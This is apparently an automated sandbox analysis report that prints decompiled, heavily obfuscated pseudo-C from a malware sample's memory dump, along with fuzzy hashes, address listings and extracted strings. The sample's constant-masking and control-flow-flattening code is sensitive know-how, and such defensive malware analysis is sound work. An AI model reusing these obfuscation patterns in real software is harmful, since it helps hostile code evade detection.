Similarity

API ID:
String ID: "6$<a$Sl$n>${fg$|u$o
API String ID: 0-4282296459
Opcode ID: 069db1e7bab7f3b13c41ed17f6fbf742274518a040dc86f1bdc138483ea4e4bf
Instruction ID: 2f64e1efd79cb1c80f5353bed22cc559208ec490685af193de62f5c1a6b5bb04
Opcode Fuzzy Hash: 069db1e7bab7f3b13c41ed17f6fbf742274518a040dc86f1bdc138483ea4e4bf
Instruction Fuzzy Hash: 1C8165716083419FD358CF25C98541FBBE2FBD5398F114A1DF5899A2A0CBB5CA898F83

Uniqueness

Uniqueness Score: -1.00%

Function 1000ECFE Relevance: 8.9, Strings: 7, Instructions: 136
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E1000ECFE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _t116;
				signed int _t127;
				void* _t129;
				void* _t138;
				signed int* _t141;

				_push(_a20);
				_push(0xffffffff);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10012550(_t116);
				_v20 = 0x26c0;
				_t141 =  &(( &_v56)[7]);
				_v20 = _v20 ^ 0x5664ed39;
				_t138 = 0;
				_v20 = _v20 ^ 0x56649557;
				_t129 = 0x182a63aa;
				_v48 = 0x49af;
				_v48 = _v48 + 0x9fa0;
				_v48 = _v48 ^ 0xbfb607f5;
				_v48 = _v48 | 0x3e98ce00;
				_v48 = _v48 ^ 0xbfbeae2a;
				_v44 = 0xe339;
				_v44 = _v44 << 8;
				_v44 = _v44 + 0xffffc89f;
				_v44 = _v44 ^ 0x00e37c5d;
				_v52 = 0x404f;
				_v52 = _v52 >> 0xe;
				_v52 = _v52 * 6;
				_v52 = _v52 | 0x81baeb5b;
				_v52 = _v52 ^ 0x81bad7ee;
				_v24 = 0x7b81;
				_v24 = _v24 >> 6;
				_v24 = _v24 ^ 0x000042e8;
				_v56 = 0x974b;
				_v56 = _v56 + 0xec91;
				_v56 = _v56 * 0x5d;
				_v56 = _v56 >> 6;
				_v56 = _v56 ^ 0x00026e38;
				_v36 = 0x4dfa;
				_v36 = _v36 * 5;
				_v36 = _v36 + 0xe29b;
				_v36 = _v36 ^ 0x00025248;
				_v40 = 0xa60b;
				_v40 = _v40 * 0x3d;
				_v40 = _v40 + 0xffff1aad;
				_v40 = _v40 ^ 0x0026c01f;
				_v4 = 0xcf11;
				_v4 = _v4 + 0x8c52;
				_v4 = _v4 ^ 0x0001090b;
				_v28 = 0xbe78;
				_v28 = _v28 + 0xc58c;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x00002e12;
				_v8 = 0x6ce6;
				_v8 = _v8 + 0x5143;
				_v8 = _v8 ^ 0x0000f5d1;
				_t137 = _v4;
				_v12 = 0xe698;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x000e27c4;
				_v32 = 0x833d;
				_v32 = _v32 << 0xf;
				_v32 = _v32 + 0xb306;
				_v32 = _v32 ^ 0x419f4493;
				_v16 = 0x1ad3;
				_v16 = _v16 << 0xf;
				_v16 = _v16 ^ 0x0d69ea92;
				while(_t129 != 0x182a63aa) {
					if(_t129 == 0x251a2d5f) {
						E1000F108(_v4, _v28, 0xffffffff, _a4, _a8, _v8, _t129, _v12, _t137, _t138, _v32, _v16);
					} else {
						if(_t129 == 0x2efe34a0) {
							_push(_t129);
							_t138 = E100054FB(_t137 + _t137);
							if(_t138 != 0) {
								_t129 = 0x251a2d5f;
								continue;
							}
						} else {
							if(_t129 != 0x34522f7d) {
								L10:
								if(_t129 != 0x226dac5d) {
									continue;
								} else {
								}
							} else {
								_t127 = E1000F108(_v20, _v48, 0xffffffff, _a4, _a8, _v44, _t129, _v52, 0, 0, _v24, _v56);
								_t137 = _t127;
								_t141 =  &(_t141[0xa]);
								if(_t127 != 0) {
									_t129 = 0x2efe34a0;
									continue;
								}
							}
						}
					}
					return _t138;
				}
				_t129 = 0x34522f7d;
				goto L10;
			}

0x1000ed04
0x1000ed08
0x1000ed0a
0x1000ed0c
0x1000ed10
0x1000ed14
0x1000ed15
0x1000ed16
0x1000ed1b
0x1000ed23
0x1000ed26
0x1000ed2e
0x1000ed30
0x1000ed38
0x1000ed3d
0x1000ed4a
0x1000ed52
0x1000ed5a
0x1000ed62
0x1000ed6a
0x1000ed72
0x1000ed77
0x1000ed7f
0x1000ed87
0x1000ed8f
0x1000ed99
0x1000ed9d
0x1000eda5
0x1000edad
0x1000edb5
0x1000edba
0x1000edc2
0x1000edca
0x1000edd7
0x1000eddb
0x1000ede0
0x1000ede8
0x1000edf5
0x1000edf9
0x1000ee01
0x1000ee09
0x1000ee16
0x1000ee1a
0x1000ee22
0x1000ee2a
0x1000ee32
0x1000ee3a
0x1000ee42
0x1000ee4a
0x1000ee52
0x1000ee57
0x1000ee5f
0x1000ee67
0x1000ee6f
0x1000ee77
0x1000ee7b
0x1000ee83
0x1000ee88
0x1000ee90
0x1000ee98
0x1000ee9d
0x1000eea5
0x1000eead
0x1000eeb5
0x1000eeba
0x1000eec2
0x1000eecc
0x1000ef6e
0x1000eece
0x1000eed4
0x1000ef25
0x1000ef2b
0x1000ef30
0x1000ef32
0x00000000
0x1000ef32
0x1000eed6
0x1000eedc
0x1000ef3b
0x1000ef41
0x00000000
0x00000000
0x1000ef47
0x1000eede
0x1000ef05
0x1000ef0a
0x1000ef0c
0x1000ef11
0x1000ef13
0x00000000
0x1000ef13
0x1000ef11
0x1000eedc
0x1000eed4
0x1000ef7e
0x1000ef7e
0x1000ef36
0x00000000

Strings

O@, xrefs: 1000ED87
}/R4, xrefs: 1000EF36
CQ, xrefs: 1000EE67
B, xrefs: 1000EDBA
}/R4, xrefs: 1000EED6
9dV, xrefs: 1000ED26
]|, xrefs: 1000ED7F

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 9dV$CQ$O@$]|$}/R4$}/R4$B
API String ID: 0-3349067434
Opcode ID: a69a9a61e040f6e4c42a649665921e8b69e3d038fde6fb2fb45657c27c919242
Instruction ID: 1a1ad4e5cfbc27e0f080d40320c9d625e8887aecc08afd20fe5c21a424830773
Opcode Fuzzy Hash: a69a9a61e040f6e4c42a649665921e8b69e3d038fde6fb2fb45657c27c919242
Instruction Fuzzy Hash: 145105714093829BD794CF61C84981BBBE1FBC57A8F504A0CF1E5662A4D3B9DA49CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1000F9BA Relevance: 7.8, Strings: 6, Instructions: 288
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E1000F9BA(void* __edx) {
				void* __ecx;
				void* _t230;
				intOrPtr* _t252;
				void* _t254;
				intOrPtr _t260;
				intOrPtr _t261;
				intOrPtr _t266;
				intOrPtr* _t272;
				void* _t274;
				signed int _t276;
				intOrPtr _t305;
				intOrPtr _t307;
				intOrPtr* _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				intOrPtr _t316;
				void* _t318;
				void* _t319;
				void* _t321;

				_t272 =  *((intOrPtr*)(_t318 + 0x80));
				_t308 =  *((intOrPtr*)(_t318 + 0x80));
				_push(_t272);
				_push( *((intOrPtr*)(_t318 + 0x8c)));
				_push(_t308);
				_push(__edx);
				E10012550(_t230);
				 *((intOrPtr*)(_t318 + 0x88)) = 0x1d8a34;
				_t319 = _t318 + 0x14;
				 *((intOrPtr*)(_t319 + 0x78)) = 0x5b8674;
				_t307 = 0;
				 *((intOrPtr*)(_t319 + 0x7c)) = 0;
				 *(_t319 + 0x28) = 0xb766;
				_t274 = 0x3039966c;
				_t309 = 0x72;
				 *(_t319 + 0x2c) =  *(_t319 + 0x28) / _t309;
				 *(_t319 + 0x2c) =  *(_t319 + 0x2c) << 3;
				 *(_t319 + 0x2c) =  *(_t319 + 0x2c) << 0xb;
				 *(_t319 + 0x2c) =  *(_t319 + 0x2c) ^ 0x0066fe1e;
				 *(_t319 + 0x28) = 0x26e;
				 *(_t319 + 0x28) =  *(_t319 + 0x28) ^ 0x211d89c8;
				_t310 = 0x74;
				 *(_t319 + 0x28) =  *(_t319 + 0x28) / _t310;
				 *(_t319 + 0x28) =  *(_t319 + 0x28) >> 4;
				 *(_t319 + 0x28) =  *(_t319 + 0x28) ^ 0x000485a3;
				 *(_t319 + 0x6c) = 0xe762;
				 *(_t319 + 0x6c) =  *(_t319 + 0x6c) >> 1;
				 *(_t319 + 0x6c) =  *(_t319 + 0x6c) ^ 0x00005f9f;
				 *(_t319 + 0x68) = 0xaff4;
				 *(_t319 + 0x68) =  *(_t319 + 0x68) + 0x7828;
				 *(_t319 + 0x68) =  *(_t319 + 0x68) ^ 0x0001439f;
				 *(_t319 + 0x34) = 0xcb25;
				 *(_t319 + 0x34) =  *(_t319 + 0x34) + 0xffffb8d3;
				 *(_t319 + 0x34) =  *(_t319 + 0x34) >> 0xa;
				 *(_t319 + 0x34) =  *(_t319 + 0x34) + 0xffffe26e;
				 *(_t319 + 0x34) =  *(_t319 + 0x34) ^ 0xffff9e5a;
				 *(_t319 + 0x30) = 0xc32b;
				 *(_t319 + 0x30) =  *(_t319 + 0x30) | 0xe65bb1cf;
				_t311 = 0x26;
				 *(_t319 + 0x2c) =  *(_t319 + 0x30) / _t311;
				 *(_t319 + 0x2c) =  *(_t319 + 0x2c) ^ 0xfcdd71a1;
				 *(_t319 + 0x2c) =  *(_t319 + 0x2c) ^ 0xfad2c55c;
				 *(_t319 + 0x44) = 0x3fe0;
				 *(_t319 + 0x44) =  *(_t319 + 0x44) + 0xffff9bb9;
				 *(_t319 + 0x44) =  *(_t319 + 0x44) ^ 0x68f0e63f;
				 *(_t319 + 0x44) =  *(_t319 + 0x44) ^ 0x970f0c5a;
				 *(_t319 + 0x60) = 0x8a37;
				 *(_t319 + 0x60) =  *(_t319 + 0x60) << 6;
				 *(_t319 + 0x60) =  *(_t319 + 0x60) ^ 0x0022b94e;
				 *(_t319 + 0x34) = 0x571;
				 *(_t319 + 0x34) =  *(_t319 + 0x34) >> 0xe;
				 *(_t319 + 0x34) =  *(_t319 + 0x34) + 0xffff24df;
				 *(_t319 + 0x34) =  *(_t319 + 0x34) ^ 0xffff3e5c;
				 *(_t319 + 0x4c) = 0x95d9;
				 *(_t319 + 0x4c) =  *(_t319 + 0x4c) | 0xe7fe2ada;
				 *(_t319 + 0x4c) =  *(_t319 + 0x4c) ^ 0xe7fea73a;
				 *(_t319 + 0x40) = 0x73df;
				 *(_t319 + 0x40) =  *(_t319 + 0x40) * 0x6b;
				 *(_t319 + 0x40) =  *(_t319 + 0x40) + 0x4d5f;
				 *(_t319 + 0x40) =  *(_t319 + 0x40) ^ 0x0030fb20;
				 *(_t319 + 0x20) = 0xe6ed;
				 *(_t319 + 0x20) =  *(_t319 + 0x20) >> 7;
				 *(_t319 + 0x20) =  *(_t319 + 0x20) * 0x63;
				_t312 = 0x6c;
				 *(_t319 + 0x24) =  *(_t319 + 0x20) / _t312;
				 *(_t319 + 0x24) =  *(_t319 + 0x24) ^ 0x000007c6;
				 *(_t319 + 0x40) = 0xf0c6;
				 *(_t319 + 0x40) =  *(_t319 + 0x40) + 0x590f;
				 *(_t319 + 0x40) =  *(_t319 + 0x40) << 2;
				 *(_t319 + 0x40) =  *(_t319 + 0x40) ^ 0x0005396a;
				 *(_t319 + 0x60) = 0x3771;
				 *(_t319 + 0x60) =  *(_t319 + 0x60) << 0xe;
				 *(_t319 + 0x60) =  *(_t319 + 0x60) ^ 0x0ddc1ff2;
				 *(_t319 + 0x5c) = 0x9a5a;
				 *(_t319 + 0x5c) =  *(_t319 + 0x5c) >> 6;
				 *(_t319 + 0x5c) =  *(_t319 + 0x5c) ^ 0x000002fa;
				 *(_t319 + 0x58) = 0x55e2;
				 *(_t319 + 0x58) =  *(_t319 + 0x58) ^ 0xef99e16a;
				 *(_t319 + 0x58) =  *(_t319 + 0x58) ^ 0xef99b4e6;
				 *(_t319 + 0x18) = 0xddcf;
				 *(_t319 + 0x18) =  *(_t319 + 0x18) + 0xffffd9e8;
				_t313 = 0x76;
				 *(_t319 + 0x18) =  *(_t319 + 0x18) / _t313;
				 *(_t319 + 0x18) =  *(_t319 + 0x18) ^ 0xfe0ce3a4;
				 *(_t319 + 0x18) =  *(_t319 + 0x18) ^ 0xfe0c9dd3;
				 *(_t319 + 0x54) = 0x5bdd;
				 *(_t319 + 0x54) =  *(_t319 + 0x54) + 0xffd3;
				 *(_t319 + 0x54) =  *(_t319 + 0x54) ^ 0x000145b1;
				 *(_t319 + 0x3c) = 0x44f;
				_t314 = 0x66;
				 *(_t319 + 0x3c) =  *(_t319 + 0x3c) / _t314;
				 *(_t319 + 0x3c) =  *(_t319 + 0x3c) ^ 0x4a8254b5;
				 *(_t319 + 0x3c) =  *(_t319 + 0x3c) ^ 0x4a825342;
				 *(_t319 + 0x14) = 0xc963;
				 *(_t319 + 0x14) =  *(_t319 + 0x14) + 0x81df;
				_t315 = 0x4e;
				 *(_t319 + 0x10) =  *(_t319 + 0x14) * 0x2c;
				 *(_t319 + 0x10) =  *(_t319 + 0x10) | 0x15242836;
				 *(_t319 + 0x10) =  *(_t319 + 0x10) ^ 0x153cd105;
				 *(_t319 + 0x1c) = 0xede;
				 *(_t319 + 0x1c) =  *(_t319 + 0x1c) | 0xa2b3614c;
				 *(_t319 + 0x1c) =  *(_t319 + 0x1c) * 0x5a;
				_t316 =  *((intOrPtr*)(_t319 + 0x70));
				 *(_t319 + 0x1c) =  *(_t319 + 0x1c) / _t315;
				 *(_t319 + 0x1c) =  *(_t319 + 0x1c) ^ 0x00a7e5fc;
				 *(_t319 + 0x18) = 0x965c;
				 *(_t319 + 0x18) =  *(_t319 + 0x18) << 8;
				 *(_t319 + 0x18) =  *(_t319 + 0x18) * 0x27;
				 *(_t319 + 0x18) =  *(_t319 + 0x18) + 0xc4fd;
				 *(_t319 + 0x18) =  *(_t319 + 0x18) ^ 0x16e8bc96;
				while(1) {
					_t251 =  *((intOrPtr*)(_t319 + 0x48));
					while(1) {
						L2:
						_t321 = _t274 - 0x239299c3;
						if(_t321 > 0) {
							break;
						}
						if(_t321 == 0) {
							E10010FE4(_t274,  *(_t319 + 0x6c));
							_t274 = 0xabf6969;
							while(1) {
								_t251 =  *((intOrPtr*)(_t319 + 0x48));
								goto L2;
							}
						}
						if(_t274 == 0x6178099) {
							_t274 = 0x2e2e6a11;
							continue;
						}
						if(_t274 == 0xa9c22c2) {
							if( *((intOrPtr*)(_t272 + 4)) < 0x74) {
								L30:
								return _t307;
							}
							_t274 = 0x6178099;
							continue;
						}
						if(_t274 == 0xabf6969) {
							if(_t307 == 0) {
								E1000DE81( *(_t319 + 0x6c),  *_t308,  *((intOrPtr*)(_t319 + 0x64)));
							}
							goto L30;
						}
						if(_t274 == 0xfdd9a18) {
							_push(_t274);
							_t266 =  *0x10020400; // 0x0
							E100055B6( *((intOrPtr*)(_t319 + 0x74)),  *((intOrPtr*)(_t319 + 0x70)),  *((intOrPtr*)(_t319 + 0x94)),  *((intOrPtr*)(_t319 + 0x8c)),  *((intOrPtr*)(_t266 + 0x18)),  *(_t319 + 0x2c), _t274, _t274,  *(_t319 + 0x5c),  *(_t319 + 0x40),  *(_t319 + 0x14));
							_t319 = _t319 + 0x28;
							_t307 =  !=  ? 1 : _t307;
							_t274 = 0x239299c3;
							while(1) {
								_t251 =  *((intOrPtr*)(_t319 + 0x48));
								goto L2;
							}
						}
						if(_t274 != 0x22b04821) {
							L26:
							if(_t274 == 0x26ae1a3c) {
								goto L30;
							}
							while(1) {
								_t251 =  *((intOrPtr*)(_t319 + 0x48));
								goto L2;
							}
						}
						E10006374( *((intOrPtr*)(_t319 + 0x38)),  *_t308, _t316, _t251,  *(_t319 + 0x4c));
						_t319 = _t319 + 0xc;
						_t274 = 0x33e31eb3;
						while(1) {
							_t251 =  *((intOrPtr*)(_t319 + 0x48));
							goto L2;
						}
					}
					if(_t274 == 0x2c8b1a44) {
						_t252 =  *0x10020400; // 0x0
						_t254 = E100072A4( *(_t319 + 0x44), _t319 + 0x70,  *(_t319 + 0x3c),  *((intOrPtr*)(_t319 + 0x50)), _t274,  *((intOrPtr*)(_t319 + 0x64)),  *_t252);
						_t319 = _t319 + 0x18;
						if(_t254 == 0) {
							_t274 = 0xabf6969;
							goto L26;
						}
						_t274 = 0x22b04821;
						while(1) {
							_t251 =  *((intOrPtr*)(_t319 + 0x48));
							goto L2;
						}
					}
					if(_t274 == 0x2e2e6a11) {
						 *((intOrPtr*)(_t308 + 4)) =  *((intOrPtr*)(_t272 + 4)) - 0x74;
						_push(_t274);
						_t260 = E100054FB( *((intOrPtr*)(_t308 + 4)));
						 *_t308 = _t260;
						if(_t260 == 0) {
							goto L30;
						}
						_t261 =  *_t272;
						_t274 = 0x2c8b1a44;
						 *((intOrPtr*)(_t319 + 0x70)) = _t261;
						_t251 = _t261 + 0x74;
						 *((intOrPtr*)(_t319 + 0x48)) = _t261 + 0x74;
						_t316 =  *((intOrPtr*)(_t272 + 4)) - 0x74;
						goto L2;
					}
					if(_t274 == 0x3039966c) {
						_t274 = 0xa9c22c2;
						goto L2;
					}
					if(_t274 != 0x33e31eb3) {
						goto L26;
					}
					_push(_t274);
					_t305 =  *0x10020400; // 0x0
					_t276 =  *(_t319 + 0x58);
					E10004648(_t276,  *((intOrPtr*)(_t305 + 0x10)),  *((intOrPtr*)(_t319 + 0x88)), _t308 + 4,  *(_t319 + 0x34),  *(_t319 + 0x4c), _t274,  *((intOrPtr*)(_t319 + 0x64)),  *_t308);
					_t319 = _t319 + 0x20;
					asm("sbb ecx, ecx");
					_t274 = (_t276 & 0xec4b0055) + 0x239299c3;
				}
			}

0x1000f9be
0x1000f9c7
0x1000f9cf
0x1000f9d0
0x1000f9d7
0x1000f9d8
0x1000f9da
0x1000f9df
0x1000f9ea
0x1000f9ed
0x1000f9f5
0x1000f9f7
0x1000f9fd
0x1000fa05
0x1000fa10
0x1000fa15
0x1000fa1b
0x1000fa20
0x1000fa25
0x1000fa2d
0x1000fa35
0x1000fa41
0x1000fa46
0x1000fa4c
0x1000fa51
0x1000fa59
0x1000fa61
0x1000fa65
0x1000fa6d
0x1000fa75
0x1000fa7d
0x1000fa85
0x1000fa8d
0x1000fa95
0x1000fa9a
0x1000faa2
0x1000faaa
0x1000fab2
0x1000fabe
0x1000fac1
0x1000fac5
0x1000facd
0x1000fad5
0x1000fadd
0x1000fae5
0x1000faed
0x1000faf5
0x1000fafd
0x1000fb02
0x1000fb0a
0x1000fb12
0x1000fb17
0x1000fb1f
0x1000fb27
0x1000fb2f
0x1000fb37
0x1000fb3f
0x1000fb4c
0x1000fb50
0x1000fb58
0x1000fb60
0x1000fb68
0x1000fb72
0x1000fb7e
0x1000fb83
0x1000fb89
0x1000fb91
0x1000fb99
0x1000fba1
0x1000fba6
0x1000fbae
0x1000fbb6
0x1000fbbb
0x1000fbc3
0x1000fbcb
0x1000fbd0
0x1000fbd8
0x1000fbe0
0x1000fbe8
0x1000fbf0
0x1000fbf8
0x1000fc04
0x1000fc09
0x1000fc0f
0x1000fc17
0x1000fc1f
0x1000fc27
0x1000fc2f
0x1000fc37
0x1000fc43
0x1000fc48
0x1000fc4e
0x1000fc56
0x1000fc5e
0x1000fc66
0x1000fc73
0x1000fc74
0x1000fc78
0x1000fc80
0x1000fc88
0x1000fc90
0x1000fc9d
0x1000fca7
0x1000fcab
0x1000fcaf
0x1000fcb7
0x1000fcbf
0x1000fcc9
0x1000fccd
0x1000fcd5
0x1000fcdd
0x1000fcdd
0x1000fce1
0x1000fce1
0x1000fce1
0x1000fce7
0x00000000
0x00000000
0x1000fced
0x1000fdbb
0x1000fdc1
0x1000fcdd
0x1000fcdd
0x00000000
0x1000fcdd
0x1000fcdd
0x1000fcf9
0x1000fda5
0x00000000
0x1000fda5
0x1000fd05
0x1000fd95
0x1000fed9
0x1000fee2
0x1000fee2
0x1000fd9b
0x00000000
0x1000fd9b
0x1000fd11
0x1000fec7
0x1000fed3
0x1000fed8
0x00000000
0x1000fec7
0x1000fd1d
0x1000fd46
0x1000fd59
0x1000fd77
0x1000fd7e
0x1000fd84
0x1000fd87
0x1000fcdd
0x1000fcdd
0x00000000
0x1000fcdd
0x1000fcdd
0x1000fd25
0x1000feb8
0x1000febe
0x00000000
0x00000000
0x1000fcdd
0x1000fcdd
0x00000000
0x1000fcdd
0x1000fcdd
0x1000fd37
0x1000fd3c
0x1000fd3f
0x1000fcdd
0x1000fcdd
0x00000000
0x1000fcdd
0x1000fcdd
0x1000fdd1
0x1000fe80
0x1000fe9d
0x1000fea2
0x1000fea7
0x1000feb3
0x00000000
0x1000feb3
0x1000fea9
0x1000fcdd
0x1000fcdd
0x00000000
0x1000fcdd
0x1000fcdd
0x1000fddd
0x1000fe48
0x1000fe56
0x1000fe57
0x1000fe5c
0x1000fe61
0x00000000
0x00000000
0x1000fe63
0x1000fe65
0x1000fe6d
0x1000fe71
0x1000fe74
0x1000fe78
0x00000000
0x1000fe78
0x1000fde5
0x1000fe38
0x00000000
0x1000fe38
0x1000fded
0x00000000
0x00000000
0x1000fdf3
0x1000fe06
0x1000fe0c
0x1000fe1b
0x1000fe20
0x1000fe25
0x1000fe2d
0x1000fe2d

Strings

?, xrefs: 1000FAD5
_M, xrefs: 1000FB50
(x, xrefs: 1000FA75
U, xrefs: 1000FBD8
q7, xrefs: 1000FBAE
b, xrefs: 1000FA59

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: (x$_M$b$q7$?$U
API String ID: 0-3432079992
Opcode ID: 26d6b6ec35bca668a1e081636b5b1540c4e151c9a44bc83e653cff40a0a807ea
Instruction ID: ba95a152c1909c72a90cf8b8c04283a8a25f7c041761d5461cb2a76a6cbe64f9
Opcode Fuzzy Hash: 26d6b6ec35bca668a1e081636b5b1540c4e151c9a44bc83e653cff40a0a807ea
Instruction Fuzzy Hash: 0CD176715083418FE368CF25C98992FBBF1FB84784F108A1DF696862A5C7B6D949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10012C05 Relevance: 6.4, Strings: 5, Instructions: 196
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E10012C05() {
				char _v524;
				void* _v536;
				intOrPtr _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				short* _t200;
				void* _t208;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t246;
				void* _t248;

				_t248 = (_t246 & 0xfffffff8) - 0x268;
				_v540 = 0x4aeeb3;
				asm("stosd");
				_t208 = 0x168467f0;
				_t237 = 0x77;
				asm("stosd");
				asm("stosd");
				_v568 = 0xd92c;
				_v568 = _v568 >> 3;
				_v568 = _v568 << 4;
				_v568 = _v568 ^ 0x0001ce43;
				_v604 = 0x418b;
				_v604 = _v604 * 0x64;
				_v604 = _v604 + 0xffff391d;
				_v604 = _v604 / _t237;
				_v604 = _v604 ^ 0x00007a4a;
				_v596 = 0xd566;
				_v596 = _v596 | 0xeedd709a;
				_v596 = _v596 ^ 0xf9b8657b;
				_t238 = 0x6f;
				_v596 = _v596 * 0x5e;
				_v596 = _v596 ^ 0x974b04be;
				_v612 = 0x6f9a;
				_v612 = _v612 | 0x3884a709;
				_v612 = _v612 << 0xf;
				_v612 = _v612 << 6;
				_v612 = _v612 ^ 0xf3601087;
				_v580 = 0x8bec;
				_v580 = _v580 >> 9;
				_v580 = _v580 ^ 0x2eaf309c;
				_v580 = _v580 ^ 0x2eaf504a;
				_v560 = 0xa090;
				_v560 = _v560 * 9;
				_v560 = _v560 ^ 0x0005eac7;
				_v544 = 0x385a;
				_v544 = _v544 ^ 0x5ab572c8;
				_v544 = _v544 ^ 0x5ab54f08;
				_v616 = 0x2ce0;
				_v616 = _v616 * 0x53;
				_v616 = _v616 | 0xcc7552e6;
				_v616 = _v616 << 0xa;
				_v616 = _v616 ^ 0xff7bc757;
				_v588 = 0xba69;
				_v588 = _v588 ^ 0x8b3f6b4e;
				_v588 = _v588 | 0x1d9047e7;
				_v588 = _v588 * 0x71;
				_v588 = _v588 ^ 0x83ae1873;
				_v600 = 0x31bb;
				_v600 = _v600 | 0x7d88d622;
				_v600 = _v600 >> 6;
				_v600 = _v600 << 3;
				_v600 = _v600 ^ 0x0fb10440;
				_v608 = 0xa2c7;
				_v608 = _v608 | 0x1a87515d;
				_v608 = _v608 + 0x2205;
				_v608 = _v608 << 0xc;
				_v608 = _v608 ^ 0x815e66bd;
				_v548 = 0x16a6;
				_v548 = _v548 / _t238;
				_v548 = _v548 ^ 0x00007853;
				_v564 = 0xafe9;
				_v564 = _v564 >> 6;
				_v564 = _v564 + 0x5855;
				_v564 = _v564 ^ 0x00006462;
				_v572 = 0x600e;
				_v572 = _v572 >> 0x10;
				_v572 = _v572 + 0xffff4dcd;
				_v572 = _v572 ^ 0xffff74cd;
				_v576 = 0x4506;
				_v576 = _v576 ^ 0x208744c8;
				_t239 = 0x27;
				_v576 = _v576 / _t239;
				_v576 = _v576 ^ 0x00d5f9e3;
				_v552 = 0x4cfb;
				_t240 = 0x5d;
				_v552 = _v552 / _t240;
				_v552 = _v552 ^ 0x00002411;
				_v584 = 0xa1f9;
				_v584 = _v584 * 0x65;
				_v584 = _v584 >> 7;
				_v584 = _v584 + 0xffff7216;
				_v584 = _v584 ^ 0xffffd98b;
				_v556 = 0x4ff1;
				_v556 = _v556 + 0xffffdafb;
				_v556 = _v556 ^ 0x000023fd;
				_v592 = 0xb847;
				_v592 = _v592 ^ 0xa357aca7;
				_v592 = _v592 * 0x3b;
				_v592 = _v592 << 2;
				_v592 = _v592 ^ 0x94472c8e;
				do {
					while(_t208 != 0xdfc3d3e) {
						if(_t208 == 0x107f2098) {
							_t200 = E1000D6F0(E1000FFBA, _v552, _v584, _v556,  &_v524, _v592, 0,  &_v524);
						} else {
							if(_t208 == 0x168467f0) {
								_t208 = 0x2514110a;
								continue;
							} else {
								_t255 = _t208 - 0x2514110a;
								if(_t208 != 0x2514110a) {
									goto L8;
								} else {
									_push(0x100012d8);
									_push(_v612);
									_push(_v596);
									E1000A4D7(_t255, _v560, _v544, _v616, _v588, E10005DFC(_v568, _v604, _t255),  *0x10021088 + 0x254,  &_v524,  *0x10021088 + 0x38);
									_t200 = E10010D6D(_v600, _v608, _v548, _t202);
									_t248 = _t248 + 0x34;
									_t208 = 0xdfc3d3e;
									continue;
								}
							}
						}
						L11:
						return _t200;
					}
					_t200 = E1000BDCC( &_v524, _v564, _v572, _v576);
					__eflags = 0;
					 *_t200 = 0;
					_t208 = 0x107f2098;
					L8:
					__eflags = _t208 - 0x23e79497;
				} while (__eflags != 0);
				goto L11;
			}

0x10012c0b
0x10012c11
0x10012c25
0x10012c26
0x10012c2d
0x10012c30
0x10012c31
0x10012c32
0x10012c3a
0x10012c3f
0x10012c44
0x10012c4c
0x10012c59
0x10012c5d
0x10012c6d
0x10012c71
0x10012c79
0x10012c81
0x10012c89
0x10012c96
0x10012c97
0x10012c9b
0x10012ca3
0x10012cab
0x10012cb3
0x10012cb8
0x10012cbd
0x10012cc5
0x10012ccd
0x10012cd2
0x10012cda
0x10012ce2
0x10012cef
0x10012cf3
0x10012cfb
0x10012d03
0x10012d0b
0x10012d13
0x10012d20
0x10012d24
0x10012d2c
0x10012d31
0x10012d39
0x10012d41
0x10012d49
0x10012d56
0x10012d5a
0x10012d62
0x10012d6a
0x10012d72
0x10012d77
0x10012d7c
0x10012d84
0x10012d8c
0x10012d94
0x10012d9c
0x10012da1
0x10012da9
0x10012db7
0x10012dbb
0x10012dc3
0x10012dcb
0x10012dd0
0x10012dd8
0x10012de2
0x10012def
0x10012df9
0x10012e06
0x10012e0e
0x10012e16
0x10012e24
0x10012e29
0x10012e2f
0x10012e37
0x10012e43
0x10012e46
0x10012e4a
0x10012e52
0x10012e5f
0x10012e63
0x10012e68
0x10012e70
0x10012e78
0x10012e80
0x10012e88
0x10012e90
0x10012e98
0x10012ea5
0x10012ea9
0x10012eae
0x10012eb6
0x10012eb6
0x10012ec0
0x10012f91
0x10012ec6
0x10012ecc
0x10012f41
0x00000000
0x10012ece
0x10012ece
0x10012ed0
0x00000000
0x10012ed6
0x10012ed6
0x10012edb
0x10012edf
0x10012f20
0x10012f32
0x10012f37
0x10012f3a
0x00000000
0x10012f3a
0x10012ed0
0x10012ecc
0x10012f99
0x10012fa0
0x10012fa0
0x10012f58
